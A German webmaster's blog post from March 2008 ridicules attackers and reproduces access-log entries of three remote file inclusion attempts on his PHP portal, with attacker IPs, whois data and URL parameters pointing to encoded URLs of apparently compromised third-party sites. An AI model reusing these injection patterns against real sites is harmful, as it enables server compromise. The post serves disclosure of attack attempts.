Am 18.03.08 ging es dann weiter, die Amateure versuchten weiterhin erfolglos, mein Portal zu hacken.
Auch diesmal versuchten es einer über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.
Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!
Der erste Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 222.255.3.68 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 222.255.0.0 - 222.255.3.255netname: VDC-NET
country: vn
descr: VietNam Data Communication Company
Hier das Protokoll:
18.03.08, 16:58:05, 222.255.3.68, /index.php?page=services/osData/php121/php121db.php?php121dir=http://www.cdpm3.com/id.txt?
Der zweite Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 88.191.26.64 seine Spur hinterlies, kam über folgenden Provider:
inetnum: 88.191.3.0 - 88.191.248.255netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Customers
descr: Paris, France
Hier das Protokoll, der hat sich ja richtig Mühe gegeben aber das tut ein blindes Huhn ja auch:
18.03.08, 21:34:20, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.agv-schaafheim.de%2F
gallery%2Fdata%2Fmedia%2Fnexa%2Fzevela%2F
18.03.08, 21:34:22, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b
%2Fpages%2Fgodot%2Feridehi%2F
18.03.08, 21:34:23, 88.191.26.64, /index.php?page=http%3A%2F%2Fwww.polisgrandhotel.gr%2F
_cm_admin%2Fmaillist%2Feditor%2Fplugins%2Fcore%2Fdialogs%2Fqunik%2Futanac%2F
18.03.08, 21:34:35, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
fabcraft.co.uk%2Fforum%2Fugak%2Fmiketat%2F
18.03.08, 21:34:36, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
tcmforum.com%2Fweb%2Fsal%2Fyuveli%2F
18.03.08, 21:34:37, 88.191.26.64, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.
clubnataciotortosa.com%2FUserFiles%2FFile%2Fedut%2Fjezin%2F
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=articles
18.03.08, 21:34:39, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fsites.
redskycreative.com%2Fcanyonlakechurch%2Fjolalu%2Fbuq%2F
18.03.08, 21:34:40, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
soeasywebsite.com%2Fsoeasycasino%2Fenosucu%2Fijani%2F
18.03.08, 21:34:41, 88.191.26.64, /index.php?page=showarticle&articleid=http%3A%2F%2Fwww.
landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fotitob%2F
18.03.08, 21:34:42, 88.191.26.64, /index.php?page=privacy
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:44, 88.191.26.64, /?orderby=http%3A%2F%2Fwww.centralbalkannationalpark.org
%2Fde%2Fjage%2Fcevoyi%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=http%3A%2F%2Fctot.ru%2Fsts%2Fst22.files%2Fcusipu
%2Fhidola%2Fapa%2F&sortorder=asc
18.03.08, 21:34:45, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.planet-
pictures.de%2Fcontent_system%2Fola%2Fitil%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fhonamfishing.co.kr
%2Fphpmysqladmin%2Flibraries%2Fnov%2Fwulosu%2F
18.03.08, 21:34:46, 88.191.26.64, /?orderby=gender&sortorder=http%3A%2F%2Fwww.marsbook.co.kr
%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F
18.03.08, 21:34:47, 88.191.26.64, /index.php?page=terms_of_use
18.03.08, 21:34:48, 88.191.26.64, /index.php?page=showarticle&articleid=1
18.03.08, 21:34:48, 88.191.26.64, /?orderby=gender&sortorder=asc
18.03.08, 21:34:49, 88.191.26.64, /?orderby=sincedate&sortorder=asc
Der dritte Versuch am 18.03.08
Der Amateur, der hier mittels seiner IP 209.62.86.4 seine Spur hinterlies, kam über folgenden Provider:
OrgName: ThePlanet.com Internet Services, Inc.OrgID: TPCM
Address: 315 Capitol
Address: Suite 205
City: Houston
NetRange: 209.62.0.0 - 209.62.127.255
Hier das Protokoll, frei nach dem Motto "und mühsam ernährt sich das Eichörnchen":
18.03.08, 22:27:03, 209.62.86.4, /index.php?page=http%3A%2F%2F
www.sanyoclim.fr%2Fextension%2Fezodf%2Fedidu%2Feyep%2F
18.03.08, 22:27:05, 209.62.86.4, /index.php?page=http%3A%2F%2Fsinzinuri.com%2Fimsi%2Fdb%2F
pic%2Fhuv%2Fabey%2F
18.03.08, 22:27:06, 209.62.86.4, /index.php?page=http%3A%2F%2Fwww.zetesis.biz%2FLMR%2Fade
%2Fzupe%2F
18.03.08, 22:27:08, 209.62.86.4, /index.php?page=shownews&newsid=
http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fenosucu
%2Fijani%2F
18.03.08, 22:27:10, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fwww.blankner
.ocps.net%2Fmedia%2Fimages%2Fefepi%2Fasopuy%2F
18.03.08, 22:27:11, 209.62.86.4, /index.php?page=shownews&newsid=http%3A%2F%2Fchyngachanga
.ru%2Fcontent%2Fwuge%2Fasagula%2F
18.03.08, 22:27:16, 209.62.86.4, /index.php?page=login
18.03.08, 22:27:18, 209.62.86.4, /index.php?page=shownews&newsid=6
18.03.08, 22:27:23, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2F
MType%2Farchives%2Fajuq%2Fpiy%2F&sortorder=asc
18.03.08, 22:27:25, 209.62.86.4, /?orderby=http%3A%2F%2Fsites.redskycreative.com%2Fcanyonlakechurch
%2Fjolalu%2Fbuq%2F&sortorder=asc
18.03.08, 22:27:26, 209.62.86.4, /?orderby=http%3A%2F%2Fwww.snowmobile.ro%2Fphoto%2Fproduct%2F
_ugohoj%2Ferisa%2Fodiy%2Fwifefef%2F&sortorder=asc
18.03.08, 22:27:28, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.municipioxii.it%2F
sunnyway%2Figodoq%2Fbukosud%2F
18.03.08, 22:27:30, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.antwerpsupporter
.be%2Fsubscribe_2_me_to-delete%2Fsm%2Fexported_files1%2
Fmosupoz%2Fadusa%2Fojafujo%2Faweji%2F
18.03.08, 22:27:31, 209.62.86.4, /?orderby=city&sortorder=http%3A%2F%2Fwww.lamarguerite.ca%2F
Pat%2Fimages%2Fawixeta%2Fveb%2F
18.03.08, 22:27:33, 209.62.86.4, /index.php?page=terms_of_use
18.03.08, 22:27:42, 209.62.86.4, /?orderby=city&sortorder=asc
18.03.08, 22:27:44, 209.62.86.4, /?orderby=country&sortorder=asc
Auch für diesen Tag gilt, planloses Starten von irgendwelchen Tools, wo diese Dilettanten gar nicht so recht wissen, was sie da eigentlich tun. Schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster
Keine Kommentare:
Kommentar veröffentlichen